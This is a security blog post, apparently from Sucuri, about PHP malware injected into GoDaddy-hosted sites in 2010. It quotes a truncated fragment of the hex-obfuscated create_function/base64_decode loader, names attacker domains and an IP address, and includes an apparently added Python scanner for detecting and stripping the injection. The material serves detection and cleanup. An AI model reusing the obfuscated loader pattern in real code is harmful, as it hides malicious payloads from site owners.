Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:


All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the familiar eval(base64_decode(...)) trick, here built from create_function and base64_decode with the function names hex-escaped. What is interesting is that this site is hosted at 77.78.239.53, an IP address used in previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com

Clean Up Action

The following script should clean up any infected site:

Updated 10/31/10 14:25 Pacific.

If you don’t have SSH access, download this file to your desktop: GoDaddy Fix 10/31/10

Once you have the file downloaded, rename gdd-fix_php.txt to gdd-fix_php.php

Upload the fix file to your site via FTP/SFTP, then open it in your browser (example: http://yoursite.com/gdd-fix_php.php)

This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.
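As an added example (not Sucuri's gdd-fix script, which is not reproduced on this page), the following Python scanner shows how the injection quoted above can be detected and cleaned: it decodes hex-escaped PHP string literals, flags files where they spell out create_function or base64_decode, and strips the chain of $_<hex> statements that carries the payload. The sample file content is constructed from the fragment quoted above, and the assumption that the injected code is a run of consecutive $_<hex> statements is taken from that fragment; scan_tree is a hypothetical helper, not part of the original post.

```python
import re
from pathlib import Path

# Hex-escaped PHP string literal, e.g. "\x63\x72\x65..." (decodes to ASCII).
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
# One statement of the injected chain: starts with a $_<hex> variable, ends at ';'.
CHAIN_STMT = re.compile(r'\s*\$_[0-9a-f]{4,}[^;]*;')
# Function names the obfuscation on this page hides; eval is the usual variant.
SUSPECT = {"create_function", "base64_decode", "eval"}

# Constructed sample of an infected file, shaped like the fragment quoted on the page
# (the base64 argument is padded: "aWYoZnVuYw==" decodes to "if(func").
SAMPLE_INFECTED = (
    r'<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";'
    r'$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";'
    r'$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuYw=="));$_8b7b1f56(); ?>' "\n"
    r'<?php echo "legitimate site code"; ?>' "\n"
)


def decode_hex_literal(escaped):
    """Turn '\\x63\\x72' into 'cr' so the hidden function names become readable."""
    return bytes.fromhex(escaped.replace("\\x", "")).decode("latin-1")


def hidden_functions(source):
    """Sorted names of suspect PHP functions hidden inside hex-escaped literals."""
    names = {decode_hex_literal(m.group(1)) for m in HEX_LITERAL.finditer(source)}
    return sorted(names & SUSPECT)


def strip_injection(source):
    """Return (cleaned_source, removed_text); removed_text is '' if nothing was found.

    The chain is located at the first $_<hex> statement whose hex literal decodes
    to a suspect function name, then extended over every immediately following
    $_<hex> statement (the shape of the injected code on this page).
    """
    for m in CHAIN_STMT.finditer(source):
        lit = HEX_LITERAL.search(m.group(0))
        if not lit or decode_hex_literal(lit.group(1)) not in SUSPECT:
            continue
        start, end = m.start(), m.end()
        while (nxt := CHAIN_STMT.match(source, end)):
            end = nxt.end()
        return source[:start] + source[end:], source[start:end]
    return source, ""


def scan_tree(root):
    """Yield (path, hidden function names) for every PHP file under root that looks injected."""
    for path in Path(root).rglob("*.php"):
        found = hidden_functions(path.read_text(errors="replace"))
        if found:
            yield path, found
```

Run scan_tree over the site root first and review the report; only then apply strip_injection to the flagged files, keeping a backup of each original.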


For older exploits, please check out our Simple Cleanup Solution.


If you need help cleaning up your site, contact us at support@sucuri.net or at http://sucuri.net

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.